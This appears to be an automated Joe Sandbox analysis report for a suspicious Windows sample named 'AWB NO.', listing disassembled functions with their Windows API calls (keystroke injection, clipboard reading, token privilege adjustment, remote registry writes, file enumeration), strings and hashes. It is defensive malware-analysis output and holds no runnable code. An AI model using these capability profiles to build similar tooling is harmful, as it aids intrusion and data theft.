                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$EncodePointer$HandleModule
                                                              • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                                              • API String ID: 2375030495-2934716456
                                                              • Opcode ID: 37018ef09e61eeb8788ffb138e8c15e030d19576da4f2edabd8f218fab1bed34
                                                              • Instruction ID: e626714c91d0c7dbfdc0833c3e6d4c5428515fa870e92d1af930db287ca2cc4a
                                                              • Opcode Fuzzy Hash: 37018ef09e61eeb8788ffb138e8c15e030d19576da4f2edabd8f218fab1bed34
                                                              • Instruction Fuzzy Hash: 8F61C871D50719AB8B41AFB9AC49E1BBFB8BB56B01318093FA505D3170DAB8B1448F5C
                                                              Function 0048CDAC Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CE50
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CE91
                                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0048CED6
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CF00
                                                              • SendMessageW.USER32 ref: 0048CF29
                                                              • GetKeyState.USER32(00000011), ref: 0048CFC2
                                                              • GetKeyState.USER32(00000009), ref: 0048CFCF
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CFE5
                                                              • GetKeyState.USER32(00000010), ref: 0048CFEF
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048D018
                                                              • SendMessageW.USER32 ref: 0048D03F
                                                              • SendMessageW.USER32(?,00001030,?,0048B602), ref: 0048D145
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048D15B
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048D16E
                                                              • SetCapture.USER32(?), ref: 0048D177
                                                              • ClientToScreen.USER32(?,?), ref: 0048D1DC
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048D1E9
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048D203
                                                              • ReleaseCapture.USER32 ref: 0048D20E
                                                              • GetCursorPos.USER32(?), ref: 0048D248
                                                              • ScreenToClient.USER32(?,?), ref: 0048D255
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D2B1
                                                              • SendMessageW.USER32 ref: 0048D2DF
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D31C
                                                              • SendMessageW.USER32 ref: 0048D34B
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D36C
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D37B
                                                              • GetCursorPos.USER32(?), ref: 0048D39B
                                                              • ScreenToClient.USER32(?,?), ref: 0048D3A8
                                                              • GetParent.USER32(?), ref: 0048D3C8
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D431
                                                              • SendMessageW.USER32 ref: 0048D462
                                                              • ClientToScreen.USER32(?,?), ref: 0048D4C0
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D4F0
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D51A
                                                              • SendMessageW.USER32 ref: 0048D53D
                                                              • ClientToScreen.USER32(?,?), ref: 0048D58F
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D5C3
                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048D65F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                              • String ID: @GUI_DRAGID$F$prL
                                                              • API String ID: 3429851547-935584803
                                                              • Opcode ID: eef717720eefd59f73d49ca6bac646d6b6d7166b2b66563ab2f11c7c6069f366
                                                              • Instruction ID: 229d4578051541fcfaeada0f8769b60f9343d3431cda2b16350b0a1bbbc6a0ce
                                                              • Opcode Fuzzy Hash: eef717720eefd59f73d49ca6bac646d6b6d7166b2b66563ab2f11c7c6069f366
                                                              • Instruction Fuzzy Hash: 6842BD30605240AFD720EF28C888F6EBBE5FF48314F144A2EF655972A1D7359845CBAA
                                                              Function 0048804A Relevance: 56.6, APIs: 31, Strings: 1, Instructions: 571windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0048873F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: %d/%02d/%02d
                                                              • API String ID: 3850602802-328681919
                                                              • Opcode ID: 6a2d1e94b4128379bb34fc1b3e0cbababfa2b18e408b3ca4a086c08858a076f5
                                                              • Instruction ID: 36cb0aac88b98b8da02c5ab338f868b1959a7ece2bc6b86039ddf895eacba2ba
                                                              • Opcode Fuzzy Hash: 6a2d1e94b4128379bb34fc1b3e0cbababfa2b18e408b3ca4a086c08858a076f5
                                                              • Instruction Fuzzy Hash: 1112F371500214ABEB24AF24CC49FAF7BB4EF45710F60492EF915EA2E1EF788941CB18
                                                              Function 00404A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,?), ref: 00404A3D
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043DA8E
                                                              • IsIconic.USER32(?), ref: 0043DA97
                                                              • ShowWindow.USER32(?,00000009), ref: 0043DAA4
                                                              • SetForegroundWindow.USER32(?), ref: 0043DAAE
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043DAC4
                                                              • GetCurrentThreadId.KERNEL32 ref: 0043DACB
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043DAD7
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043DAE8
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043DAF0
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043DAF8
                                                              • SetForegroundWindow.USER32(?), ref: 0043DAFB
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB10
                                                              • keybd_event.USER32(00000012,00000000), ref: 0043DB1B
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB25
                                                              • keybd_event.USER32(00000012,00000000), ref: 0043DB2A
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB33
                                                              • keybd_event.USER32(00000012,00000000), ref: 0043DB38
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB42
                                                              • keybd_event.USER32(00000012,00000000), ref: 0043DB47
                                                              • SetForegroundWindow.USER32(?), ref: 0043DB4A
                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0043DB71
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: f79b4016a452e3713d3f296b67be0db1888c659ea2cd4af33083302438d8d314
                                                              • Instruction ID: e7c85a06078abd95958a76b560472cb4de1ee0cbe7850f23b5b82bf1a514fd8d
                                                              • Opcode Fuzzy Hash: f79b4016a452e3713d3f296b67be0db1888c659ea2cd4af33083302438d8d314
                                                              • Instruction Fuzzy Hash: 5A31A571E40318BBEB206F619C49F7F7E6CEB48B50F11403AFA00E61D1D6B45D11ABA9
                                                              Function 00458858 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00458CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00458D0D
                                                                • Part of subcall function 00458CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458D3A
                                                                • Part of subcall function 00458CC3: GetLastError.KERNEL32 ref: 00458D47
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004588ED
                                                              • CloseHandle.KERNEL32(?), ref: 004588FE
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00458915
                                                              • GetProcessWindowStation.USER32 ref: 0045892E
                                                              • SetProcessWindowStation.USER32(00000000), ref: 00458938
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00458952
                                                                • Part of subcall function 00458713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458851), ref: 00458728
                                                                • Part of subcall function 00458713: CloseHandle.KERNEL32(?,?,00458851), ref: 0045873A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
                                                              • String ID: $default$winsta0
                                                              • API String ID: 3576815822-1027155976
                                                              • Opcode ID: 419f165f4d43a7c464fc589f135e513a2b9869e9240be7cd00308c3b96a92a96
                                                              • Instruction ID: ae404ca8ccb8fb5f7dd2bd2e3b65d1cf0b905714558ed317be623f38cd8f3382
                                                              • Opcode Fuzzy Hash: 419f165f4d43a7c464fc589f135e513a2b9869e9240be7cd00308c3b96a92a96
                                                              • Instruction Fuzzy Hash: FE813971900209AFDF11DFA4DC45AAE7BB8AF04305F18456EFD10B6262DF398E199B68
                                                              Function 0047425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenClipboard.USER32(0048F910), ref: 00474284
                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00474292
                                                              • GetClipboardData.USER32(0000000D), ref: 0047429A
                                                              • CloseClipboard.USER32 ref: 004742A6
                                                              • GlobalLock.KERNEL32(00000000), ref: 004742C2
                                                              • CloseClipboard.USER32 ref: 004742CC
                                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 004742E1
                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 004742EE
                                                              • GetClipboardData.USER32(00000001), ref: 004742F6
                                                              • GlobalLock.KERNEL32(00000000), ref: 00474303
                                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00474337
                                                              • CloseClipboard.USER32 ref: 00474447
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                              • String ID:
                                                              • API String ID: 3222323430-0
                                                              • Opcode ID: 242ea9b293539fa8edddfb01bb1a9ee0f2cb880ff5f78f930b8151185364f359
                                                              • Instruction ID: 082334e5e034a6364df9055b72bce31f15e3661d5fbc7ec5f34bc60242ce87dd
                                                              • Opcode Fuzzy Hash: 242ea9b293539fa8edddfb01bb1a9ee0f2cb880ff5f78f930b8151185364f359
                                                              • Instruction Fuzzy Hash: F451A331204201ABD311AF65DC85FBF77A8AF84B04F10493EF559E21E2DB78D9098B6A
                                                              Function 00480AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480BDE
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 00480C4C
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480C94
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480D1D
                                                              • RegCloseKey.ADVAPI32(?), ref: 0048103D
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0048104A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: 70d8badf95e59334598ba87ec9ba9af4f6bf7a56bd4470d821e3c976ae198e48
                                                              • Instruction ID: 28c6f411a619af197dfaf8748c0be50b5585ff8e0b7448e963b4b9ec0364d3ae
                                                              • Opcode Fuzzy Hash: 70d8badf95e59334598ba87ec9ba9af4f6bf7a56bd4470d821e3c976ae198e48
                                                              • Instruction Fuzzy Hash: 80025E752106119FCB14EF19C841E2AB7E5FF89714F04886EF8899B3A2CB78ED45CB49
                                                              Function 0046F200 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 119fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,77888FB0,?,00000000), ref: 0046F221
                                                              • GetFileAttributesW.KERNEL32(?), ref: 0046F25F
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0046F279
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F291
                                                              • FindClose.KERNEL32(00000000), ref: 0046F29C
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F2B8
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F308
                                                              • SetCurrentDirectoryW.KERNEL32(004BA5A0), ref: 0046F326
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F330
                                                              • FindClose.KERNEL32(00000000), ref: 0046F33D
                                                              • FindClose.KERNEL32(00000000), ref: 0046F34F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1409584000-438819550
                                                              • Opcode ID: 58bcf13c288eddfd2e692422b01c0418072611c199188e78e98c6afa980456a9
                                                              • Instruction ID: 0b5727808e6486dbc8ba1fd208fa3d2423740367e5f37dc41973d7f20295688a
                                                              • Opcode Fuzzy Hash: 58bcf13c288eddfd2e692422b01c0418072611c199188e78e98c6afa980456a9
                                                              • Instruction Fuzzy Hash: D231F7765012196ACF10DFB0EC58ADF73AC9F48360F5045BBE840D3290E739DA898B2D
                                                              Function 00416843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$OaA$PJJ$UCP)$UTF)$UTF16)
                                                              • API String ID: 0-887578391
                                                              • Opcode ID: 9f56f4a328962fb90a34fc3a88c96b69726f9e3444872868eefc29649ad329b2
                                                              • Instruction ID: 3784516a1003e1c275ce3f2ff5430e7d36dc90e0b9f0d34c2957a4bb797dab3e
                                                              • Opcode Fuzzy Hash: 9f56f4a328962fb90a34fc3a88c96b69726f9e3444872868eefc29649ad329b2
                                                              • Instruction Fuzzy Hash: 8B72AE71E002199BDB24CF59C8807EEB7B5EF48310F15806BE849EB391E7789D85CB99
                                                              Function 004581F7 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00458766
                                                                • Part of subcall function 0045874A: GetLastError.KERNEL32(?,0045822A,?,?,?), ref: 00458770
                                                                • Part of subcall function 0045874A: GetProcessHeap.KERNEL32(00000008,?,?,0045822A,?,?,?), ref: 0045877F
                                                                • Part of subcall function 0045874A: HeapAlloc.KERNEL32(00000000,?,0045822A,?,?,?), ref: 00458786
                                                                • Part of subcall function 0045874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045879D
                                                                • Part of subcall function 004587E7: GetProcessHeap.KERNEL32(00000008,00458240,00000000,00000000,?,00458240,?), ref: 004587F3
                                                                • Part of subcall function 004587E7: HeapAlloc.KERNEL32(00000000,?,00458240,?), ref: 004587FA
                                                                • Part of subcall function 004587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00458240,?), ref: 0045880B
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0045825B
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0045828F
                                                              • GetLengthSid.ADVAPI32(?), ref: 004582A0
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 004582DD
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004582F9
                                                              • GetLengthSid.ADVAPI32(?), ref: 00458316
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00458325
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0045832C
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0045834D
                                                              • CopySid.ADVAPI32(00000000), ref: 00458354
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00458385
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004583AB
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004583BF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                              • String ID:
                                                              • API String ID: 1795222879-0
                                                              • Opcode ID: 27d3b1d758ce327bd6ff960f42808705922d37cc0f2b3be1dedc4948f6e72ee5
                                                              • Instruction ID: d5b260a28bbd50cd38a870094945b07d29d7a3b63504d6cb352bb9851184e42d
                                                              • Opcode Fuzzy Hash: 27d3b1d758ce327bd6ff960f42808705922d37cc0f2b3be1dedc4948f6e72ee5
                                                              • Instruction Fuzzy Hash: AE616C71900209AFDF00DFA1DC44AAEBBB9FF04705F14856EFC15A6292DF399A19CB64
                                                              Function 0046F35D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,77888FB0,?,00000000), ref: 0046F37E
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0046F3D9
                                                              • FindClose.KERNEL32(00000000), ref: 0046F3E4
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F400
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F450
                                                              • SetCurrentDirectoryW.KERNEL32(004BA5A0), ref: 0046F46E
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F478
                                                              • FindClose.KERNEL32(00000000), ref: 0046F485
                                                              • FindClose.KERNEL32(00000000), ref: 0046F497
                                                                • Part of subcall function 004645C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004645DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 2640511053-438819550
                                                              • Opcode ID: ec6b9d9e702f045fbfb62a8a4d4bf93f4726aadb3ab887182078068f471a89aa
                                                              • Instruction ID: b075de1a3a6116e48bb9cf245284ec928ecdd711139cb2480e8db77f57688df7
                                                              • Opcode Fuzzy Hash: ec6b9d9e702f045fbfb62a8a4d4bf93f4726aadb3ab887182078068f471a89aa
                                                              • Instruction Fuzzy Hash: 7031C6716011196ACF10AF64FC84ADF77AC9F45364F60417BE890D22A0EB39DA89CB6D
                                                              Function 00480665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00480038,?,?), ref: 004810BC
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480737
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004807D6
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0048086E
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480AAD
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480ABA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
